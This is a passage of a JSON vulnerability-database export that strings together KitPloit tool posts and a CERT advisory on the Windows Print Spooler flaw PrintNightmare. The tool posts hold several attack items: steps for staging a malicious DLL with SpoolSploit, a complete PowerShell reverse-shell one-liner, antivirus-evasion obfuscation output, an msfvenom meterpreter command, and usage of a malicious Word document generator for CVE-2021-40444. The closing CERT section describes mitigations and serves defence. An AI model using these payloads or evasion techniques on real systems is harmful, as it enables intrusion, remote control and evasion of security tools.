malicious DLLs when executing the `printnightmare` attack in SpoolSploit. The default SMB server settings work, but if you want to customize them you can modify the configuration file located at `/home/dlogmas/smbserver/smb-v1.conf`.\n\nThe only thing you need to do is copy your DLL to the SMB server's share folder in the SpoolSploit container. The share path in the container is `/home/dlogmas/smbserver/share/`. The following commands demonstrate how to upload a DLL to the SpoolSploit container and make it accessible to the SMB server.\n \n \n sudo docker cp ./malicious.dll spoolsploit:/home/dlogmas/smbserver/share/ \n sudo docker exec spoolsploit /bin/sh -c 'sudo chown dlogmas:dlogmas /home/dlogmas/smbserver/share/malicious.dll' \n \n\n \n\n\n[](<https://1.bp.blogspot.com/-IqUvx7SXavM/YVi9igITTRI/AAAAAAAAvWs/9nikcO6EzWcW7r2BBW6nLGx3obnPjHIDgCNcBGAsYHQ/s1483/SpoolSploit_3_PrintNightmare.gif>)\n\n \n\n\n**Disclaimer** \n\n\nThis proof-of-concept code has been created for academic research and is not intended to be used against systems except where explicitly authorized. The code is provided as is with no guarantees or promises on its execution. I am not responsible or liable for misuse of this code.\n\n \n**Credits** \n \n**SpoolSample - [Microsoft](<https://www.kitploit.com/search/label/Microsoft> \"Microsoft\" ) Feature** \n\n\n * [leechristensen](<https://github.com/leechristensen/SpoolSample> \"leechristensen\" ) discovered the SpoolSample exploit and created a C# POC [SpoolSample](<https://github.com/leechristensen/SpoolSample/tree/master/SpoolSample> \"SpoolSample\" )\n * [3xocyte](<https://gist.github.com/3xocyte> \"3xocyte\" ) created a Python2 SpoolSample POC [dementor](<https://gist.github.com/3xocyte/cfaf8a34f76569a8251bde65fe69dccc#file-dementor-py> \"dementor\" ).\n \n**PrintNightmare - CVE-2021-1675 / CVE-2021-34527** \n\n\n * [cube0x0](<https://github.com/cube0x0> \"cube0x0\" ) created Python PrintNightmare exploit after implementing the MS-PAR &amp; MS-RPRN protocols and API calls in [Impacket](<https://github.com/SecureAuthCorp/impacket> \"Impacket\" ).\n * [Zhiniang Peng](<https://twitter.com/edwardzpeng> \"Zhiniang Peng\" ) &amp; [Xuefeng Li](<https://twitter.com/lxf02942370> \"Xuefeng Li\" ) discovered this exploit.\n \n \n\n\n**[Download SpoolSploit](<https://github.com/BeetleChunks/SpoolSploit> \"Download SpoolSploit\" )**\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-07T11:30:00", "type": "kitploit", "title": "SpoolSploit - A Collection Of Windows Print Spooler Exploits Containerized With Other Utilities For Practical Exploitation", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-10-07T11:30:00", "id": "KITPLOIT:232707789076746523", "href": "http://www.kitploit.com/2021/10/spoolsploit-collection-of-windows-print.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T16:23:35", "description": "[](<https://blogger.googleusercontent.com/img/a/AVvXsEhvHxpOWiJ1NSyXmIWJcHIH7haCoxHylKQQ9-j13MtsLdnMdFOU3Mzs_QT7x-7RH3us_9j08DEzdwUUYAPpQnJXC_nUaLHCR2LExWqmgwds-IjoRT4nQX-xhj8cAaFUbvlzvaxpYW509hY4DMGpm0kUk_I1wN8WgTaW6V-Q-mPKVPdUK6tCiLavJcby_w>)\n\n \n\n\nTraditional [obfuscation](<https://www.kitploit.com/search/label/Obfuscation> \"obfuscation\" ) [techniques](<https://www.kitploit.com/search/label/Techniques> \"techniques\" ) tend to add layers to encapsulate standing code, such as base64 or compression. These payloads do continue to have a varied degree of success, but they have become trivial to extract the intended payload and some launchers get detected often, which essentially introduces chokepoints.\n\nThe approach this tool introduces is a methodology where you can target and obfuscate the individual components of a script with randomized variations while achieving the same intended logic, without encapsulating the entire payload within a single layer. Due to the complexity of the obfuscation logic, the resulting payloads will be very difficult to signature and will slip past heuristic engines that are not programmed to emulate the inherited logic.\n\nWhile this script can obfuscate most payloads successfully on it's own, this project will also serve as a standing framework that I will to use to produce future functions that will utilize this framework to provide dedicated obfuscated payloads, such as one that only produces reverse shells.\n\nI wrote a blog piece for Offensive Security as a precursor into the techniques this tool introduces. Before venturing further, consider giving it a read first: <https://www.offensive-security.com/offsec/powershell-obfuscation/>\n\n \n\n\n## Dedicated Payloads\n\nAs part of my on going work with [PowerShell](<https://www.kitploit.com/search/label/PowerShell> \"PowerShell\" ) obfuscation, I am building out scripts that produce dedicated payloads that utilize this framework. These have helped to save me time and hope you find them useful as well. You can find them within their own folders at the root of this repository.\n\n 1. Get-ReverseShell\n 2. Get-DownloadCradle\n 3. Get-Shellcode\n\n## Components\n\nLike many other programming languages, PowerShell can be broken down into many different components that make up the executable logic. This allows us to defeat signature-based detections with relative ease by changing how we represent individual components within a payload to a form an obscure or unintelligible derivative.\n\nKeep in mind that targeting every component in complex payloads is very instrusive. This tool is built so that you can target the components you want to obfuscate in a controlled manner. I have found that a lot of signatures can be defeated simply by targeting cmdlets, variables and any comments. When using this against complex payloads, such as print nightmare, keep in mind that custom function parameters / variables will also be changed. Always be sure to properly test any resulting payloads and ensure you are aware of any modified named paramters.\n\nComponent types such as pipes and pipeline variables are introduced here to help make your payload more obscure and harder to decode.\n\n**Supported Types**\n\n * Aliases (iex)\n * Cmdlets (New-Object)\n * Comments (# and &lt;# #&gt;)\n * Integers (4444)\n * Methods ($client.GetStream())\n * Namespace Classes (System.Net.Sockets.TCPClient)\n * Pipes (|)\n * Pipeline Variables ($_)\n * Strings (\"value\" | 'value')\n * Variables ($client)\n\n## Generators\n\nEach component has its own dedicated generator that contains a list of possible static or dynamically generated values that are randomly selected during each execution. If there are multiple instances of a component, then it will iterative each of them individually with a generator. This adds a degree of randomness each time you run this tool against a given payload so each iteration will be different. The only exception to this is variable names.\n\nIf an algorithm related to a specific component starts to cause a payload to flag, the current design allows us to easily modify the logic for that generator without compromising the entire script.\n \n \n $Picker = 1..6 | Get-Random \n Switch ($Picker) { \n 1 { $NewValue = 'Stay' } \n 2 { $NewValue = 'Off' } \n 3 { $NewValue = 'Ronins' } \n 4 { $NewValue = 'Lawn' } \n 5 { $NewValue = 'And' } \n 6 { $NewValue = 'Rocks' } \n }\n\n## Requirements\n\nThis framework and resulting payloads have been tested on the following operating system and PowerShell versions. The resulting [reverse shells](<https://www.kitploit.com/search/label/Reverse%20Shells> \"reverse shells\" ) will not work on PowerShell v2.0\n\nPS Version | OS Tested | Invoke-PSObfucation.ps1 | Reverse Shell \n---|---|---|--- \n7.1.3 | Kali 2021.2 | Supported | Supported \n5.1.19041.1023 | Windows 10 10.0.19042 | Supported | Supported \n5.1.21996.1 | Windows 11 10.0.21996 | Supported | Supported \n \n## Usage Examples\n\n### CVE-2021-34527 (PrintNightmare)\n \n \n \u250c\u2500\u2500(tristram\u327fkali)-[~] \n \u2514\u2500$ pwsh \n PowerShell 7.1.3 \n Copyright (c) Microsoft Corporation. \n \n https://aka.ms/powershell \n Type 'help' to get help. \n \n PS /home/tristram> . ./Invoke-PSObfuscation.ps1 \n PS /home/tristram> Invoke-PSObfuscation -Path .\\CVE-2021-34527.ps1 -Cmdlets -Comments -NamespaceClasses -Variables -OutFile o-printnightmare.ps1 \n \n >> Layer 0 Obfuscation \n >> https://github.com/gh0x0st \n \n [*] Obfuscating namespace classes \n [*] Obfuscating cmdlets \n [*] Obfuscating variables \n [-] -DriverName is now -QhYm48JbCsqF \n [-] -NewUser is now -ybrcKe \n [-] -NewPassword is now -ZCA9QHerOCrEX84gMgNwnAth \n [-] -DLL is now -dNr \n [-] -ModuleName is now -jd \n [-] -Module is now -tu3EI0q1XsGrniAUzx9WkV2o \n [-] -Type is now -fjTOTLDCGufqEu \n [-] -FullName is now -0vEKnCqm \n [-] -EnumElements is now -B9aFqfvDbjtOXPxrR< br/>[-] -Bitfield is now -bFUCG7LB9gq50p4e \n [-] -StructFields is now -xKryDRQnLdjTC8 \n [-] -PackingSize is now -0CB3X \n [-] -ExplicitLayout is now -YegeaeLpPnB \n [*] Removing comments \n [*] Writing payload to o-printnightmare.ps1 \n [*] Done \n \n PS /home/tristram> \n\n### PowerShell Reverse Shell\n \n \n $client = New-Object System.Net.Sockets.TCPClient(\"127.0.0.1\",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\n\nGenerator 2 &gt;&gt; 4444 &gt;&gt; $(0-0+0+0-0-0+0+4444) Generator 1 &gt;&gt; 65535 &gt;&gt; $((65535)) [*] Obfuscating strings Generator 2 &gt;&gt; 127.0.0.1 &gt;&gt; $([char](16*49/16)+[char](109*50/109)+[char](0+55-0)+[char](20*46/20)+[char](0+48-0)+[char](0+46-0)+[char](0+48-0)+[char](0+46-0)+[char](51*49/51)) Generator 2 &gt;&gt; PS &gt;&gt; $([char](1*80/1)+[char](86+83-86)+[char](0+32-0)) Generator 1 &gt;&gt; &gt; &gt;&gt; ([string]::join('', ( (62,32) |%{ ( [char][int] $_)})) | % {$_}) [*] Obfuscating cmdlets Generator 2 &gt;&gt; New-Object &gt;&gt; &amp; ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{ ( [char][int] $_)})) | % {$_}) Generator 2 &gt;&gt; New-Object &gt;&gt; &amp; ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{ ( [char][int] $_)})) | % {$_}) Generator 1 &gt;&gt; Out-String &gt;&gt; &amp; ((\"Tpltq1LeZGDhcO4MunzVC5NIP-vfWow6RxXSkbjYAU0aJm3KEgH2sFQr7i8dy9B\")[13,16,3,25,35,3,55,57,17,49] -join '') [*] Writing payload to /home/tristram/obfuscated.ps1 [*] Done\" dir=\"auto\"&gt;\n \n \n \u250c\u2500\u2500(tristram\u327fkali)-[~] \n \u2514\u2500$ pwsh \n PowerShell 7.1.3 \n Copyright (c) Microsoft Corporation. \n \n https://aka.ms/powershell \n Type 'help' to get help. \n \n PS /home/tristram> . ./Invoke-PSObfuscation.ps1 \n PS /home/tristram> Invoke-PSObfuscation -Path ./revshell.ps1 -Integers -Cmdlets -Strings -ShowChanges \n \n >> Layer 0 Obfuscation \n >> https://github.com/gh0x0st \n \n [*] Obfuscating integers \n Generator 2 >> 4444 >> $(0-0+0+0-0-0+0+4444) \n Generator 1 >> 65535 >> $((65535)) \n [*] Obfuscating strings \n Generator 2 >> 127.0.0.1 >> $([char](16*49/16)+[char](109*50/109)+[char](0+55-0)+[char](20*46/20)+[char](0+48-0)+[char](0+46-0)+[char](0+48-0)+[char](0+46-0)+[char](51*49/51)) \n Generator 2 >> PS >> $([char](1 *80/1)+[char](86+83-86)+[char](0+32-0)) \n Generator 1 >> > >> ([string]::join('', ( (62,32) |%{ ( [char][int] $_)})) | % {$_}) \n [*] Obfuscating cmdlets \n Generator 2 >> New-Object >> & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{ ( [char][int] $_)})) | % {$_}) \n Generator 2 >> New-Object >> & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{ ( [char][int] $_)})) | % {$_}) \n Generator 1 >> Out-String >> & ((\"Tpltq1LeZGDhcO4MunzVC5NIP-vfWow6RxXSkbjYAU0aJm3KEgH2sFQr7i8dy9B\")[13,16,3,25,35,3,55,57,17,49] -join '') \n [*] Writing payload to /home/tristram/obfuscated.ps1 \n [*] Done\n\n### Obfuscated PowerShell Reverse Shell\n\n[](<https://github.com/gh0x0st/Invoke-PSObfuscation/blob/main/screenshots/0bFu5c4t3d.jpg> \"An in-depth approach to obfuscating the individual components of a PowerShell payload whether you're on Windows or Kali Linux. \\(6\\)\" )[](<https://blogger.googleusercontent.com/img/a/AVvXsEhvHxpOWiJ1NSyXmIWJcHIH7haCoxHylKQQ9-j13MtsLdnMdFOU3Mzs_QT7x-7RH3us_9j08DEzdwUUYAPpQnJXC_nUaLHCR2LExWqmgwds-IjoRT4nQX-xhj8cAaFUbvlzvaxpYW509hY4DMGpm0kUk_I1wN8WgTaW6V-Q-mPKVPdUK6tCiLavJcby_w>)\n\n### Meterpreter PowerShell Shellcode\n \n \n \u250c\u2500\u2500(tristram\u327fkali)-[~] \n \u2514\u2500$ pwsh \n PowerShell 7.1.3 \n Copyright (c) Microsoft Corporation. \n \n https://aka.ms/powershell \n Type 'help' to get help. \n \n PS /home/kali> msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 EXITFUNC=thread -f ps1 -o meterpreter.ps1 \n [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload \n [-] No arch selected, selecting arch: x86 from the payload \n No encoder specified, outputting raw payload \n Payload size: 686 bytes \n Final size of ps1 file: 3385 bytes \n Saved as: meterpreter.ps1 \n PS /home/kali> . ./Invoke-PSObfuscation.ps1 \n PS /home/kali> Invoke-PSObfuscation -Path ./meterpreter.ps1 -Integers -Variables -OutFile o-meterpreter.ps1 \n \n >> Layer 0 Obfuscation \n >> https://github.com/gh0x0st \n \n [*] Obfuscating integers \n [*] Obfuscating variables \n [*] Writing payload to o-meterpreter.ps1 \n [*] Done\n\n## Comment-Based Help\n \n \n <# \n .SYNOPSIS \n Transforms PowerShell scripts into something obscure, unclear, or unintelligible. \n \n .DESCRIPTION \n Where most obfuscation tools tend to add layers to encapsulate standing code, such as base64 or compression, \n they tend to leave the intended payload intact, which essentially introduces chokepoints. Invoke-PSObfuscation \n focuses on replacing the existing components of your code, or layer 0, with alternative values. \n \n .PARAMETER Path \n A user provided PowerShell payload via a flat file. \n \n .PARAMETER All \n The all switch is used to engage every supported component to obfuscate a given payload. This action is very intrusive \n and could result in your payload being broken. There should be no issues when using this with the vanilla reverse \n shell. However, it's recommended to target specific components with more advanced payloads. Keep in mind that some of \n the generators introduced in this script may even confuse your ISE so be sure to test properly. \n \n .PARAMETER Aliases \n The aliases switch is used to instruct the function to obfuscate aliases. \n \n .PARAMETER Cmdlets \n The cmdlets switch is used to instruct the function to obfuscate cmdlets. \n \n .PARAMETER Comments \n The comments switch is used to instruct the function to remove all comments. \n \n .PARAMETER Integers \n The integers switch is used to instruct the function to obfuscate integers. \n \n .PARAMETER Methods \n The methods switch is used to instruct the function to obfuscate method invocations. \n \n .PARAMETER NamespaceClasses \n The namespaceclasses switch is used to instruct the function to obfuscate namespace classes. \n \n .PARAMETER Pipes \n The pipes switch is used to in struct the function to obfuscate pipes. \n \n .PARAMETER PipelineVariables \n The pipeline variables switch is used to instruct the function to obfuscate pipeline variables. \n \n .PARAMETER ShowChanges \n The ShowChanges switch is used to instruct the script to display the raw and obfuscated values on the screen. \n \n .PARAMETER Strings \n The strings switch is used to instruct the function to obfuscate prompt strings. \n \n .PARAMETER Variables \n The variables switch is used to instruct the function to obfuscate variables. \n \n .EXAMPLE \n PS C:\\> Invoke-PSObfuscation -Path .\\revshell.ps1 -All \n \n .EXAMPLE \n PS C:\\> Invoke-PSObfuscation -Path .\\CVE-2021-34527.ps1 -Cmdlets -Comments -NamespaceClasses -Variables -OutFile o-printernightmare.ps1 \n \n .OUTPUTS \n System.String, System.String \n \n .NOTES \n Additional information abo ut the function. \n #>\n\n \n \n\n\n**[Download Invoke-PSObfuscation](<https://github.com/gh0x0st/Invoke-PSObfuscation> \"Download Invoke-PSObfuscation\" )**\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-21T11:30:00", "type": "kitploit", "title": "Invoke-PSObfuscation - An In-Depth Approach To Obfuscating The Individual Components Of A PowerShell Payload Whether You'Re On Windows Or Kali Linux", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2023-03-21T11:30:00", "id": "KITPLOIT:6049290411707454748", "href": "http://www.kitploit.com/2023/03/invoke-psobfuscation-in-depth-approach.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T16:24:46", "description": "[](<https://1.bp.blogspot.com/-X7RGnp89UBU/YUNCQ39MNeI/AAAAAAAAunU/ZpAc4HUyWtMEl7jz_yxyLBLvvXkpbacLwCNcBGAsYHQ/s1473/CVE-2021-40444_3_calc.png>)\n\n \n\n\nMalicious docx [generator](<https://www.kitploit.com/search/label/Generator> \"generator\" ) to exploit CVE-2021-40444 (Microsoft Office Word [Remote](<https://www.kitploit.com/search/label/Remote> \"Remote\" ) Code Execution)\n\n \n\n\nCreation of this Script is based on some [reverse engineering](<https://www.kitploit.com/search/label/Reverse%20Engineering> \"reverse engineering\" ) over the sample used in-the-wild: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx file)\n\nYou need to install lcab first (`sudo apt-get install lcab`)\n\nCheck `REPRODUCE.md` for manual reproduce steps\n\nIf your generated cab is not working, try pointing out exploit.html URL to calc.cab\n\n \n**Using** \n\n\nFirst generate a malicious docx document given a DLL, you can use the one at `test/calc.dll` which just pops a `calc.exe` from a call to `system()`\n\n`python3 exploit.py generate test/calc.dll http://<SRV IP>`\n\n \n\n\n[](<https://1.bp.blogspot.com/-SdaSc2Sass4/YUNCYPNXwRI/AAAAAAAAunc/W83xraioxaEnxgZSQFj1eb2ZTdAcBiGOQCNcBGAsYHQ/s1007/CVE-2021-40444_1_gen.png>)\n\n \n\n\nOnce you generate the malicious docx (will be at `out/`) you can setup the server:\n\n`sudo python3 exploit.py host 80`\n\n \n\n\n[](<https://1.bp.blogspot.com/-gTFup3vQ5eo/YUNCbV0QDBI/AAAAAAAAung/wvEOAQCmfakkFniNlJocSglFbVacX3S6QCNcBGAsYHQ/s866/CVE-2021-40444_2_srv.png>)\n\n \n\n\nFinally try the docx in a [Windows](<https://www.kitploit.com/search/label/Windows> \"Windows\" ) Virtual Machine:\n\n[](<https://1.bp.blogspot.com/-X7RGnp89UBU/YUNCQ39MNeI/AAAAAAAAunU/ZpAc4HUyWtMEl7jz_yxyLBLvvXkpbacLwCNcBGAsYHQ/s1473/CVE-2021-40444_3_calc.png>)\n\n \n\n\n**[Download CVE-2021-40444](<https://github.com/lockedbyte/CVE-2021-40444> \"Download CVE-2021-40444\" )**\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-16T13:13:00", "type": "kitploit", "title": "CVE-2021-40444 PoC - Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution)", "bulletinFamily": "tools", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-16T13:13:11", "id": "KITPLOIT:3697667464193804316", "href": "http://www.kitploit.com/2021/09/cve-2021-40444-poc-malicious-docx.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cert": [{"lastseen": "2023-08-07T00:11:07", "description": "### Overview\n\nThe Microsoft Windows Print Spooler service fails to restrict access to functionality that allows users to add printers and related drivers, which can allow a remote authenticated attacker to execute arbitrary code with SYSTEM privileges on a vulnerable system.\n\n### Description\n\nThe [RpcAddPrinterDriverEx()](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/b96cc497-59e5-4510-ab04-5484993b259b>) function is used to install a printer driver on a system. One of the parameters to this function is the [DRIVER_CONTAINER](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/353ff796-6fb3-41cf-8b35-0022dd53d886>) object, which contains information about which driver is to be used by the added printer. The other argument, `dwFileCopyFlags`, specifies how replacement printer driver files are to be copied. An attacker can take advantage of the fact that any authenticated user can call `RpcAddPrinterDriverEx()` and specify a driver file that lives on a remote server. This results in the Print Spooler service `spoolsv.exe` executing code in an arbitrary DLL file with SYSTEM privileges.\n\nNote that while original exploit code relied on the `RpcAddPrinterDriverEx` to achieve code execution, [an updated version of the exploit](<https://github.com/cube0x0/CVE-2021-1675>) uses [RpcAsyncAddPrinterDriver](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/5d864e3e-5d8b-4337-89ce-cb0258ab97cd>) to achieve the same goal. Both of these functions achieve their functionality using [AddPrinterDriverEx](<https://docs.microsoft.com/en-us/windows/win32/printdocs/addprinterdriverex>).\n\nWhile Microsoft has released an [update for CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>), it is important to realize that this update does **NOT** protect against public exploits that may refer to `PrintNightmare` or CVE-2021-1675.\n\nOn July 1, Microsoft released [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). This bulletin states that CVE-2021-34527 is similar but distinct from the vulnerability that is assigned CVE-2021-1675, which addresses a different vulnerability in RpcAddPrinterDriverEx(). The attack vector is different as well. CVE-2021-1675 was addressed by the June 2021 security update. \n\n### Impact\n\nBy sending a request to add a printer, e.g. by using `RpcAddPrinterDriverEx()` over SMB or `RpcAsyncAddPrinterDriver()` over RPC, a remote, authenticated attacker may be able to execute arbitrary code with SYSTEM privileges on a vulnerable system. A local unprivileged user may be able to execute arbitrary code with SYSTEM privileges as well. We have created a flowchart to indicate exploitability of PrintNightmare across various platform configurations:\n\n\n\n### Solution\n\n#### Apply an update\n\nMicrosoft has addressed this issue in the [updates for CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). Note that the Microsoft update for CVE-2021-34527 does not effectively prevent exploitation of systems where the [Point and Print](<https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-point-and-print>) `NoWarningNoElevationOnInstall` is set to a non-`0` value. Microsoft indicates that systems that have `NoWarningNoElevationOnInstall` is set to a non-`0` value are **vulnerable by design.** For systems that do not have the CVE-2021-34527 installed, or have Point and Print configured insecurely, please consider the following workarounds:\n\n#### Apply a workaround\n\nMicrosoft has listed several workarounds in their [advisory for CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). Specifically:\n\n#### Microsoft Option 1 - Stop and disable the Print Spooler service\n\nThis vulnerability can be mitigated by stopping and disabling the Print Spooler service in Windows.\n\nIf disabling the Print Spooler service is appropriate for your enterprise, use the following PowerShell commands:\n\n`Stop-Service -Name Spooler -Force`\n\n`Set-Service -Name Spooler -StartupType Disabled`\n\n**Impact of workaround** Disabling the Print Spooler service disables the ability to print both locally and remotely.\n\n#### Microsoft Option 2 - Disable inbound remote printing through Group Policy\n\nDisable the \u201cAllow Print Spooler to accept client connections:\u201d policy to block remote attacks.\n\n**Impact of workaround** This policy will block the remote attack vector by preventing inbound remote printing operations. The system will no longer function as a print server, but local printing to a directly attached device will still be possible.\n\n**Note:** The Print Spooler service **must** be restarted for this workaround to be activated.\n\n#### Block RPC and SMB ports at the firewall\n\nLimited testing has shown that blocking both the RPC Endpoint Mapper (`135/tcp`) and SMB (`139/tcp` and `445/tcp`) incoming traffic at a host-based firewall level can prevent remote exploitation of this vulnerability. Note that blocking these ports on a Windows system may prevent expected capabilities from functioning properly, especially on a system that functions as a server.\n\n#### Enable security prompts for Point and Print\n\nEnsure that the Windows Point and Print Restrictions are set to `Show warning and elevation prompt` for both installing and updating drivers in the Windows Group Policy. Specifically the `HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint\\` key should have `NoWarningNoElevationOnInstall` and `UpdatePromptSettings` entries that are both set to `0`.\n\n#### Restrict printer driver installation ability to administrators\n\nAfter the Microsoft update for CVE-2021-34527 is installed, a registry value called `RestrictDriverInstallationToAdministrators` in the `HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint\\` key is checked, which is intended to restrict printer driver installation to only administrator users. Please see [KB5005010](<https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>) for more details.\n\n### Acknowledgements\n\nThis issue was publicly disclosed by Zhiniang Peng and Xuefeng Li.\n\nThis document was written by Will Dormann.\n\n### Vendor Information\n\n383432\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n### Microsoft __ Affected\n\nNotified: 2021-06-30 Updated: 2021-07-08 **CVE-2021-1675**| Affected \n---|--- \n**CVE-2021-34527**| Affected \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>\n\n \n\n\n### References\n\n * <https://msrc-blog.microsoft.com/2021/07/08/clarified-guidance-for-cve-2021-34527-windows-print-spooler-vulnerability/>\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>\n * <https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/b96cc497-59e5-4510-ab04-5484993b259b>\n * <https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/353ff796-6fb3-41cf-8b35-0022dd53d886>\n * <https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-point-and-print>\n * <https://docs.microsoft.com/en-us/windows/win32/printdocs/addprinterdriverex>\n * <https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>\n * <https://github.com/afwu/PrintNightmare>\n * <https://github.com/cube0x0/CVE-2021-1675>\n * <https://github.com/calebstewart/CVE-2021-1675>\n\n### Other Information\n\n**CVE IDs:** | [CVE-2021-1675 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2021-1675>) [CVE-2021-34527 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2021-34527>) \n---|--- \n**Date Public:** | 2021-06-30 \n**Date First Published:** | 2021-06-30 \n**Date Last Updated: ** | 2021-08-03 15:36 UTC \n**Document Revision: ** | 32 \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-30T00:00:00", "type": "cert", "title": "Microsoft Windows Print Spooler allows for RCE via AddPrinterDriverEx()", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": 